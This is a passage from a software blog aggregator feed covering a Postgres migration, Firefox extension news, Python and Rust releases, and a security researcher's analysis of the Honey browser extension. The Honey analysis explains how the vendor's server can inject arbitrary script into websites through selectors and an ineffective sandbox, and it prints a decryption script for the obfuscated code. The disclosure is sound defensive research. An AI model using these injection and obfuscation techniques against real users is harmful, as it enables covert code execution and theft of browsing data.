This was a “forklift migration”, in the sense that we moved the data directly into Postgres with minimal modification.
Each Azure Storage table was imported into a single Postgres table of the same name, with a fixed structure:
create table queue_tasks_entities(
partition_key text,
row_key text,
value jsonb not null,
version integer not null,
etag uuid default public.gen_random_uuid()
);
alter table queue_tasks_entities add primary key (partition_key, row_key);
The importer we used was specially tuned to accomplish this import in a reasonable amount of time (hours).
For each known deployment, we scheduled a downtime to perform this migration, after extensive performance testing on development copies.
We considered options to support a downtime-free migration.
For example, we could have built an adapter that would read from Postgres and Azure, but write to Postgres.
This adapter could support production use of the service while a background process copied data from Azure to Postgres.
This option would have been very complex, especially in supporting some of the atomicity and ordering guarantees that the Taskcluster API relies on.
Failures would likely lead to data corruption and a downtime much longer than the simpler, planned downtime.
So, we opted for the simpler, planned migration.
(we’ll revisit the idea of online migrations in part 3)
The database for Firefox CI occupied about 350GB.
The other deployments, such as the community deployment, were much smaller.
Database Interface
All access to Azure Storage tables had been via the azure-entities library, with a limited and very regular interface (hence the _entities suffix on the Postgres table name).
We wrote an implementation of the same interface, but with a Postgres backend, in taskcluster-lib-entities.
The result was that none of the code in the Taskcluster microservices changed.
Not changing code is a great way to avoid introducing new bugs!
It also limited the complexity of this change: we only had to deeply understand the semantics of azure-entities, and not the details of how the queue service handles tasks.
Stored Functions
As the taskcluster-lib-entities README indicates, access to each table is via five stored database functions:
_load - load a single row
_create - create a new row
_remove - remove a row
_modify - modify a row
_scan - return some or all rows in the table
Stored functions are functions defined in the database itself, that can be redefined within a transaction.
Part 2 will get into why we made this choice.
Optimistic Concurrency
The modify function is an interesting case.
Azure Storage has no notion of a “transaction”, so the azure-entities library uses an optimistic-concurrency approach to implement atomic updates to rows.
This uses the etag column, which changes to a new value on every update, to detect and retry concurrent modifications.
While Postgres can do much better, we replicated this behavior in taskcluster-lib-entities, again to limit the changes made and avoid introducing new bugs.
A modification looks like this in Javascript:
await task.modify(task => {
if (task.status !== 'running') {
task.status = 'running';
task.started = now();
}
});
For those not familiar with JS notation, this is calling the modify method on a task, passing a modifier function which, given a task, modifies that task.
The modify method calls the modifier and tries to write the updated row to the database, conditioned on the etag still having the value it did when the task was loaded.
If the etag does not match, modify re-loads the row to get the new etag, and tries again until it succeeds.
The effect is that updates to the row occur one-at-a-time.
This approach is “optimistic” in the sense that it assumes no conflicts, and does extra work (retrying the modification) only in the unusual case that a conflict occurs.
What’s Next?
At this point, we had fork-lifted Azure tables into Postgres and no longer require an Azure account to run Taskcluster.
However, we hadn’t yet seen any of the benefits of a relational database:
data fields were still trapped in a JSON object (in fact, some kinds of data were hidden in base64-encoded blobs)
each table still only had a single primary key, and queries by any other field would still be prohibitively slow
joins between tables would also be prohibitively slow
Part 2 of this series of articles will describe how we addressed these issues.
Then part 3 will get into the details of performing large-scale database migrations without downtime. [Less]
|
Posted
over 4 years
ago
by
Jorge Villalobos
In addition to our brief update on extensions in Firefox 83, this post contains information about changes to the Firefox release calendar and a feature preview for Firefox 84.
Thanks to a contribution from Richa Sharma, the error message logged when
... [More]
a tabs.sendMessage is passed an invalid tabID is now much easier to understand. It had regressed to a generic message due to a previous refactoring.
End of Year Release Calendar
The end of 2020 is approaching (yay?), and as usual people will be taking time off and will be less available. To account for this, the Firefox Release Calendar has been updated to extend the Firefox 85 release cycle by 2 weeks. We will release Firefox 84 on 15 December and Firefox 85 on 26 January. The regular 4-week release cadence should resume after that.
Coming soon in Firefox 84: Manage Optional Permissions in Add-ons Manager
Starting with Firefox 84, currently available on the Nightly pre-release channel, users will be able to manage optional permissions of installed extensions from the Firefox Add-ons Manager (about:addons).
We recommend that extensions using optional permissions listen for the browser.permissions.onAdded and browser.permissions.onRemoved API events. This ensures the extension is aware of the user granting or revoking optional permissions.
The post Extensions in Firefox 83 appeared first on Mozilla Add-ons Blog. [Less]
|
Posted
over 4 years
ago
by
Will Kahn-Greene
What is it?
Everett is a configuration library for Python
apps.
Goals of Everett:
flexible configuration from multiple configured environments
easy testing with configuration
easy documentation of configuration for users
From that, Everett has
... [More]
the following features:
is composeable and flexible
makes it easier to provide helpful error messages for users trying to
configure your software
supports auto-documentation of configuration with a Sphinx
autocomponent directive
has an API for testing configuration variations in your tests
can pull configuration from a variety of specified sources (environment,
INI files, YAML files, dict, write-your-own)
supports parsing values (bool, int, lists of things, classes,
write-your-own)
supports key namespaces
supports component architectures
works with whatever you're writing--command line tools, web sites, system
daemons, etc
v1.0.3 released!
This is a minor maintenance update that fixes a couple of minor bugs, addresses
a Sphinx deprecation issue, drops support for Python 3.4 and 3.5, and adds
support for Python 3.8 and 3.9 (largely adding those environments to the test
suite).
Why you should take a look at Everett
At Mozilla, I'm using Everett for a variety of projects: Mozilla symbols
server, Mozilla crash ingestion pipeline, and some other tooling. We use it in
a bunch of other places at Mozilla, too.
Everett makes it easy to:
deal with different configurations between local development and
server environments
test different configuration values
document configuration options
First-class docs. First-class configuration error help. First-class testing.
This is why I created Everett.
If this sounds useful to you, take it for a spin. It's a drop-in replacement
for python-decouple and os.environ.get('CONFIGVAR', 'default_value') style
of configuration so it's easy to test out.
Enjoy!
Where to go for more
For more specifics on this release, see here:
https://everett.readthedocs.io/en/latest/history.html#october-28th-2020
Documentation and quickstart here:
https://everett.readthedocs.io/
Source code and issue tracker here:
https://github.com/willkg/everett
[Less]
|
Posted
over 4 years
ago
Honey is a popular browser extension built by the PayPal subsidiary Honey Science LLC. It promises nothing less than preventing you from wasting money on your online purchases. Whenever possible, it will automatically apply promo codes to your
... [More]
shopping cart, thus saving your money without you lifting a finger. And it even runs a reward program that will give you some money back! Sounds great, what’s the catch?
With such offers, the price you pay is usually your privacy. With Honey, it’s also security. The browser extension is highly reliant on instructions it receives from its server. I found at least four ways for this server to run arbitrary code on any website you visit. So the extension can mutate into spyware or malware at any time, for all users or only for a subset of them – without leaving any traces of the attack like a malicious extension release.
Image credits:
Honey,
Glitch,
Firkin,
j4p4n
Contents
The trouble with shopping assistants
Unique user identifiers
Remote configure everything
The highly flexible promo code applying process
When selectors aren’t actually selectors
How about some obfuscation?
Taking over the extension
About that privacy commitment…
Why you should care
The trouble with shopping assistants
Please note that there are objective reasons why it’s really hard to build a good shopping assistant. The main issue is how many online shops there are. Honey supports close to 50 thousand shops, yet I easily found a bunch of shops that were missing. Even the shops based on the same engine are typically customized and might have subtle differences in their behavior. Not just that, they will also change without an advance warning. Supporting this zoo is far from trivial.
Add to this the fact that with most of these shops there is very little money to be earned. A shopping assistant needs to work well with Amazon and Shopify. But supporting everything else has to come at close to no cost whatsoever.
The resulting design choices are the perfect recipe for a privacy nightmare:
As much server-side configuration as somehow possible, to avoid releasing new extension versions unnecessarily
As much data extraction as somehow possible, to avoid manual monitoring of shop changes
Bad code quality with many inconsistent approaches, because improving code is costly
I looked into Honey primarily due to its popularity, it being used by more than 17 million users according to the statement on the product’s website. Given the above, I didn’t expect great privacy choices. And while I haven’t seen anything indicating malice, the poor choices made still managed to exceed my expectations by far.
Unique user identifiers
By now you are probably used to reading statements like the following in company’s privacy statements:
None of the information that we collect from these events contains any personally identifiable information (PII) such as names or email addresses.
But of course a persistent semi-random user identifier doesn’t count as “personally identifiable information.” So Honey creates several of those and sends them with every request to its servers:
Here you see the exv value in the Cookie header: it is a combination of the extension version, a user ID (bound to the Honey account if any) and a device ID (locally generated random value, stored persistently in the extension data). The same value is also sent with the payload of various requests.
If you are logged into your Honey account, there will also be x-honey-auth-at and x-honey-auth-rt headers. These are an access and a refresh token respectively. It’s not that these are required (the server will produce the same responses regardless) but they once again associate your requests with your Honey account.
So that’s where this Honey privacy statement is clearly wrong: while the data collected doesn’t contain your email address, Honey makes sure to associate it with your account among other things. And the account is tied to your email address. If you were careless enough to enter your name, there will be a name associated with the data as well.
Remote configure everything
Out of the box, the extension won’t know what to do. Before it can do anything at all, it first needs to ask the server which domains it is supposed to be active on. The result is currently a huge list with some of the most popular domains like google.com, bing.com or microsoft.com listed.
Clearly, not all of google.com is an online shop. So when you visit one of the “supported” domains for the first time within a browsing session, the extension will request additional information:
Now the extension knows to ignore all of google.com but the shops listed here. It still doesn’t know anything about the shops however, so when you visit Google Play for example there will be one more request:
The metadata part of the response is most interesting as it determines much of the extension’s behavior on the respective website. For example, there are optional fields pns_siteSelSubId1 to pns_siteSelSubId3 that determine what information the extension sends back to the server later:
Here the field subid1 and similar are empty because pns_siteSelSubId1 is missing in the store configuration. Were it present, Honey would use it as a CSS selector to find a page element, extract its text and send that text back to the server. Good if somebody wants to know what exactly people are looking at.
Mind you, I only found this functionality enabled on amazon.com and macys.com, yet the selectors provided appear to be outdated and do not match anything. So is this some outdated functionality that is no longer in use and that nobody bothered removing yet? Very likely. Yet it could jump to life any time to collect more detailed information about your browsing habits.
The highly flexible promo code applying process
As you can imagine, the process of applying promo codes can vary wildly between different shops. Yet Honey needs to do it somehow without bothering the user. So while store configuration normally tends to stick to CSS selectors, for this task it will resort to JavaScript code. For example, you get the following configuration for hostgator.com:
The JavaScript code listed under pns_siteRemoveCodeAction or pns_siteSelCartCodeSubmit will be injected into the web page, so it could do anything there: add more items to the cart, change the shipping address or steal your credit card data. Honey requires us to put lots of trust into their web server, isn’t there a better way?
Turns out, Honey actually found one. Allow me to introduce a mechanism labeled as “DAC” internally for reasons I wasn’t yet able to understand:
The acorn field here contains base64-encoded JSON data. It’s the output of the acorn JavaScript parser: an Abstract Syntax Tree (AST) of some JavaScript code. When reassembled, it turns into this script:
let price = state.startPrice;
try {
$('#coupon-code').val(code);
$('#check-coupon').click();
setTimeout(3000);
price = $('#preview_total').text();
} catch (_) {
}
resolve({ price });
But Honey doesn’t reassemble the script. Instead, it runs it via a JavaScript-based JavaScript interpreter. This library is explicitly meant to run untrusted code in a sandboxed environment. All one has to do is making sure that the script only gets access to safe functionality.
But you are wondering what this $() function is, aren’t you? It almost looks like jQuery, a library that I called out as a security hazard on multiple occasions. And indeed: Honey chose to expose full jQuery functionality to the sandboxed scripts, thus rendering the sandbox completely useless.
Why did they even bother with this complicated approach? Beats me. I can only imagine that they had trouble with shops using Content Security Policy (CSP) in a way that prohibited execution of arbitrary scripts. So they decided to run the scripts outside the browser where CSP couldn’t stop them.
When selectors aren’t actually selectors
So if the Honey server turned malicious, it would have to enable Honey functionality on the target website, then trick the user into clicking the button to apply promo codes? It could even make that attack more likely to succeed because some of the CSS code styling the button is conveniently served remotely, so the button could be made transparent and spanning the entire page – the user would be bound to click it.
No, that’s still too complicated. Those selectors in the store configuration, what do you think: how are these turned into actual elements? Are you saying document.querySelector()? No, guess again. Is anybody saying “jQuery”? Yes, of course it is using jQuery for extension code as well! And that means that every selector could be potentially booby-trapped.
In the store configuration pictured above, pns_siteSelCartCodeBox field has the selector #coupon-code, [name="coupon"] as its value. What if the server replaces the selector by ? Exactly, this will happen:
This message actually appears multiple times because Honey will evaluate this selector a number of times for each page. It does that for any page of a supported store, unconditionally. Remember that whether a site is a supported store or not is determined by the Honey server. So this is a very simple and reliable way for this server to leverage its privileged access to the Honey extension and run arbitrary code on any website (Universal XSS vulnerability).
How about some obfuscation?
Now we have simple and reliable, but isn’t it also too obvious? What if somebody monitors the extension’s network requests? Won’t they notice the odd JavaScript code?
That scenario is rather unlikely actually, e.g. if you look at how long Avast has been spying on their users with barely anybody noticing. But Honey developers are always up to a challenge. And their solution was aptly named “VIM” (no, they definitely don’t mean the editor). Here is one of the requests downloading VIM code for a store:
This time, there is no point decoding the base64-encoded data: the result will be binary garbage. As it turns out, the data here has been encrypted using AES, with the start of the string serving as the key. But even after decrypting you won’t be any wiser: the resulting JSON data has all key names replaced by numeric indices and values are once again encrypted.
You need the following script to decrypt the data (requires CryptoJS):
const keys = [
"alternate", "argument", "arguments", "block", "body", "callee", "cases",
"computed", "consequent", "constructor", "declaration", "declarations",
"discriminant", "elements", "expression", "expressions", "finalizer",
"handler", "id", "init", "key", "kind", "label", "left", "method", "name",
"object", "operator", "param", "params", "prefix", "properties", "property",
"quasi", "right", "shorthand", "source", "specifiers", "superClass", "tag",
"test", "type", "update", "value"
];
function decryptValue(obj)
{
if (Array.isArray(obj))
return obj.map(decryptValue);
if (typeof obj != "object" || !obj)
return obj;
let result = {};
for (let key of Object.keys(obj))
{
let value = obj[key];
if (key.startsWith("_"))
key = keys[parseInt(key.substr(1), 10)];
if (typeof value == "string")
value = CryptoJS.AES.decrypt(value.slice(1), value[0] + "+" + key).toString(CryptoJS.enc.Utf8);
else
value = decryptValue(value);
result[key] = value;
}
return result;
}
var data = "";
data = JSON.parse(CryptoJS.AES.decrypt(data.slice(10), data.slice(0, 10)).toString(CryptoJS.enc.Utf8));
console.log(decryptValue(data));
What you get is once again the Abstract Syntax Tree (AST) of some JavaScript code. The lengthy chunks of JavaScript code are for example categorizing the pages of a shop, determining what kind of logic should apply to these. And the sandboxing is once again ineffective, with the code being provided access to jQuery for example.
So here is a mechanism, providing the server with a simple way to run arbitrary JavaScript code on any website it likes, immediately after the page loads and with sufficient obfuscation that nobody will notice anything odd. Mission accomplished?
Taking over the extension
Almost. So far we were talking about running code in the context of websites. But wouldn’t running code in the context of the extension provide more flexibility? There is a small complication: Content Security Policy (CSP) mechanism disallows running arbitrary JavaScript code in the extension context. At least that’s the case with the Firefox extension due to the Mozilla Add-ons requirements, on Chrome the extension simply relaxed CSP protection.
But that’s not really a problem of course. As we’ve already established, running the code in your own JavaScript interpreter circumvents this protection. And so the Honey extension also has VIM code that will run in the context of the extension’s background page:
It seems that the purpose of this code is extracting user identifiers from various advertising cookies. Here is an excerpt:
var cs = {
CONTID: {
name: 'CONTID',
url: 'https://www.cj.com',
exVal: null
},
s_vi: {
name: 's_vi',
url: 'https://www.linkshare.com',
exVal: null
},
_ga: {
name: '_ga',
url: 'https://www.rakutenadvertising.com',
exVal: null
},
...
};
The extension conveniently grants this code access to all cookies on any domains. This is only the case on Chrome however, on Firefox the extension doesn’t request access to cookies. That’s most likely to address concerns that Mozilla Add-ons reviewers had.
The script also has access to jQuery. With the relaxed CSP protection of the Chrome version, this allows it to load any script from paypal.com and some other domains at will. These scripts will be able to do anything that the extension can do: read or change website cookies, track the user’s browsing in arbitrary ways, inject code into websites or even modify server responses.
On Firefox the fallout is more limited. So far I could only think of one rather exotic possibility: add a frame to the extension’s background page. This would allow loading an arbitrary web page that would stay around for the duration of the browsing session while being invisible. This attack could be used for cryptojacking for example.
About that privacy commitment…
The Honey Privacy and Security policy states:
We will be transparent with what data we collect and how we use it to save you time and money, and you can decide if you’re good with that.
This sounds pretty good. But if I still have you here, I want to take a brief look at what this means in practice.
As the privacy policy explains, Honey collects information on availability and prices of items with your help. Opening a single Amazon product page results in numerous requests like the following:
The code responsible for the data sent here is only partly contained in the extension, much of it is loaded from the server:
Yes, this is yet another block of obfuscated VIM code. That’s definitely an unusual way to ensure transparency…
On the bright side, this particular part of Honey functionality can be disabled. That is, if you find the “off” switch. Rather counter-intuitively, this setting is part of your account settings on the Honey website:
Don’t know about you, but after reading this description I would be no wiser. And if you don’t have a Honey account, it seems that there is no way for you to disable this. Either way, from what I can tell this setting won’t affect other tracking like pns_siteSelSubId1 functionality outlined above.
On a side note, I couldn’t fail to notice one more interesting feature not mentioned in the privacy policy. Honey tracks ad blocker usage, and it will even re-run certain tracking requests from the extension if blocked by an ad blocker. So much for your privacy choices.
Why you should care
In the end, I found that the Honey browser extension gives its server very far reaching privileges, but I did not find any evidence of these privileges being misused. So is it all fine and nothing to worry about? Unfortunately, it’s not that easy.
While the browser extension’s codebase is massive and I certainly didn’t see all of it, it’s possible to make definitive statements about the extension’s behavior. Unfortunately, the same isn’t true for a web server that one can only observe from outside. The fact that I only saw non-malicious responses doesn’t mean that it will stay the same way in future or that other people will make the same experience.
In fact, if the server were to invade users’ privacy or do something outright malicious, it would likely try to avoid detection. One common way is to only do it for accounts that accumulated a certain amount of history. As security researchers like me usually use fairly new accounts, they won’t notice anything. Also, the server might decide to limit such functionality to countries where litigation is less likely. So somebody like me living in Europe with its strict privacy laws won’t see anything, whereas US citizens would have all of their data extracted.
But let’s say that we really trust Honey Science LLC given its great track record. We even trust PayPal who happened to acquire Honey this year. Maybe they really only want to do the right thing, by any means possible. Even then there are still at least two scenarios for you to worry about.
The Honey server infrastructure makes an extremely lucrative target for hackers. Whoever manages to gain control of it will gain control of the browsing experience for all Honey users. They will be able to extract valuable data like credit card numbers, impersonate users (e.g. to commit ad fraud), take over users’ accounts (e.g. to demand ransom) and more. Now think again how much you trust Honey to keep hackers out.
But even if Honey had perfect security, they are also a US-based company. And that means that at any time a three letter agency can ask them for access, and they will have to grant it. That agency might be interested in a particular user, and Honey provides the perfect infrastructure for a targeted attack. Or the agency might want data from all users, something that they are also known to do occasionally. Honey can deliver that as well.
And that’s the reason why Mozilla’s Add-on Policies list the following requirement:
Add-ons must be self-contained and not load remote code for execution
So it’s very surprising that the Honey browser extension in its current form is not merely allowed on Mozilla Add-ons but also marked as “Verified.” I wonder what kind of review process this extension got that none of the remote code execution mechanisms have been detected.
Edit (2020-10-28): As Hubert Figuière pointed out, extensions acquire this “Verified” badge by paying for the review. All the more interesting to learn what kind of review has been paid here.
While Chrome Web Store is more relaxed on this front, their Developer Program Policies also list the following requirement:
Developers must not obfuscate code or conceal functionality of their extension. This also applies to any external code or resource fetched by the extension package.
I’d say that the VIM mechanism clearly violates that requirement as well. As I’m still to discover a working mechanism to report violations of Chrome’s Developer Program Policies, it is to be seen whether this will have any consequences. [Less]
|
Posted
over 4 years
ago
by
TWiR Contributors
Hello and welcome to another issue of This Week in Rust!
Rust is a systems language pursuing the trifecta: safety, concurrency, and speed.
This is a weekly summary of its progress and community.
Want something mentioned? Tweet us at @ThisWeekInRust
... [More]
or send us a pull request.
Want to get involved? We love contributions.
This Week in Rust is openly developed on GitHub.
If you find any errors in this week's issue, please submit a PR.
RustFest Global
The RustFest schedule is now online! RustFest offers free tickets until November 1st. It happens across all timezones and is accessible to everyone!
Updates from Rust Community
No newsletters this week.
Official
[Inside] Core team membership changes
Tooling
Rust Analyzer Changelog #48
Knurling-rs Changelog #3
Observations/Thoughts
Fighting Rust's Expressive Type System
XMHell: Handling 38GB of UTF-16 XML with Rust
LudumDare 47 - The Island
Building a Recipe Manager - Part 3 - Parsing and more Druid
Imitating specialization with OIBITs
Flask Creator Armin Ronacher Interview
clue solver now in Rust with more accurate simulations!
Learn Rust
Rust for a Gopher Lesson 1
Rust for a Gopher Lesson 2
Build a "todo list" backend with AssemblyLift 🚀🔒
So you want to write object oriented Rust
[series] A Web App in Rust
Contributing to the IntelliJ Rust plugin: Implementing a refactoring
5x Faster Rust Docker Builds with cargo-chef
Writing a simple AWS Lambda Custom Runtime in Rust
Is Rust Web Yet? Yes, and it's freaking fast!
[video] (Live Coding) Audio adventures in Rust: Local files playback & library interface
Project Updates
Introducing Ungrammar
A new group of maintainers has taken ownership of the deps.rs project and revived the deps.rs page, making the page and generated badges for READMEs usable again.
Miscellaneous
Sandbox Rust Development with Rust Analyzer
[audio] Security Headlines: Tokio special with Carl Lerche
Crate of the Week
This week's crate is rust-gpu from Embark Studios, a system to compile Rust code into Vulkan graphics shaders (with other shader types to follow).
Thanks to Vlad Frolov for the suggestion!
Submit your suggestions and votes for next week!
Call for Participation
Always wanted to contribute to open-source projects but didn't know where to start?
Every week we highlight some tasks from the Rust community for you to pick and get started!
Some of these tasks may also have mentors available, visit the task page for more information.
heed - Create two different libraries: heed and heedx
If you are a Rust project owner and are looking for contributors, please submit tasks here.
Updates from Rust Core
400 pull requests were merged in the last week
tweak if let suggestion to be more liberal with suggestion and to not ICE
reduce diagram mess in 'match arms have incompatible types' error
tweak match arm semicolon removal suggestion to account for futures
explain where the closure return type was inferred
rewrite collect_tokens implementations to use a flattened buffer
fix trait solving ICEs
stop promoting union field accesses in 'const'
ensure that statics are inhabited
rustc_mir: track inlined callees in SourceScopeData
optimize const value interning for ZST types
calculate visibilities once in resolve
mir-opt: disable MatchBranchSimplification
implement TryFrom between NonZero types
add Pin::static_ref, static_mut
support custom allocators in Box
hashbrown: parametrize RawTable, HashSet and HashMap over an allocator
rustdoc: greatly improve display for small mobile devices screens
clippy: add linter for a single element for loop
clippy: add lint for &mut Mutex::lock
clippy: add new lint for undropped ManuallyDrop values
clippy: lint unnecessary int-to-int and float-to-float casts
Rust Compiler Performance Triage
2020-10-27:
0 Regressions, 2 Improvements, 3 Mixed
See the full report for more.
Approved RFCs
Changes to Rust follow the Rust RFC (request for comments) process. These
are the RFCs that were approved for implementation this week:
Destructuring assignment
RFC: Reading into uninitialized buffers
RFC: Promote aarch64-unknown-linux-gnu to a Tier-1 Rust target
Final Comment Period
Every week the team announces the
'final comment period' for RFCs and key PRs which are reaching a
decision. Express your opinions now.
RFCs
YieldSafe auto trait
Variadic tuples
RFC for a match based surface syntax to get pointer-to-field
Tracking Issues & PRs
[disposition: merge] Allow making RUSTC_BOOTSTRAP conditional on the crate name
[disposition: merge] consider assignments of union field of ManuallyDrop type safe
[disposition: merge] Define fs::hard_link to not follow symlinks.
[disposition: merge] repr(transparent) on generic type skips "exactly one non-zero-sized field" check
[disposition: merge] Rename/Deprecate LayoutErr in favor of LayoutError
[disposition: merge] Tracking Issue for raw_ref_macros
New RFCs
RFC: Plan to make core and std's panic identical.
Upcoming Events
Online
October 29. Berlin, DE - Rust Hack and Learn - Berline.rs
November 4. Johannesburg, ZA - Monthly Joburg Rust Chat! - Johannesburg Rust Meetup
November 4. Dublin, IE - Rust Dublin November - Rust Dublin
November 4. Indianapolis, IN, US - Indy.rs - with Social Distancing - Indy.rs
November 7 & 8, Global, RustFest Global
November 10, Seattle, WA, US - Seattle Rust Meetup
Asia Pacific
November 1. Auckland, NZ - Rust meetup - Introduction to Rust - Rust AKL
If you are running a Rust event please add it to the calendar to get
it mentioned here. Please remember to add a link to the event too.
Email the Rust Community Team for access.
Rust Jobs
Software Engineer - Rust at IOHK (Remote - EU Time Zone)
Senior Software Engineer - Data Access at Roblox (San Mateo, CA)
Tweet us at @ThisWeekInRust to get your job offers listed here!
Quote of the Week
what many devs often miss initially when talking about Rust is that it isn't just about the design & details of the language (which is great), Rust's super power is that in combination with its fantastic community & ecosystem, and the amazing friendly people that create & form it
– Johann Andersson on twitter
llogiq is pretty pleased with his own suggestion and unanimously voted for it.
Please submit quotes and vote for next week!
This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.
Discuss on r/rust [Less]
|
Posted
over 4 years
ago
by
Patrick Cloke
A couple of weeks ago I released version 0.8 of django-render-block, this was
followed up with a 0.8.1 to fix a regression.
django-render-block is a small library that allows you render a specific block
from a Django (or Jinja) template, this is frequently used for emails when …
|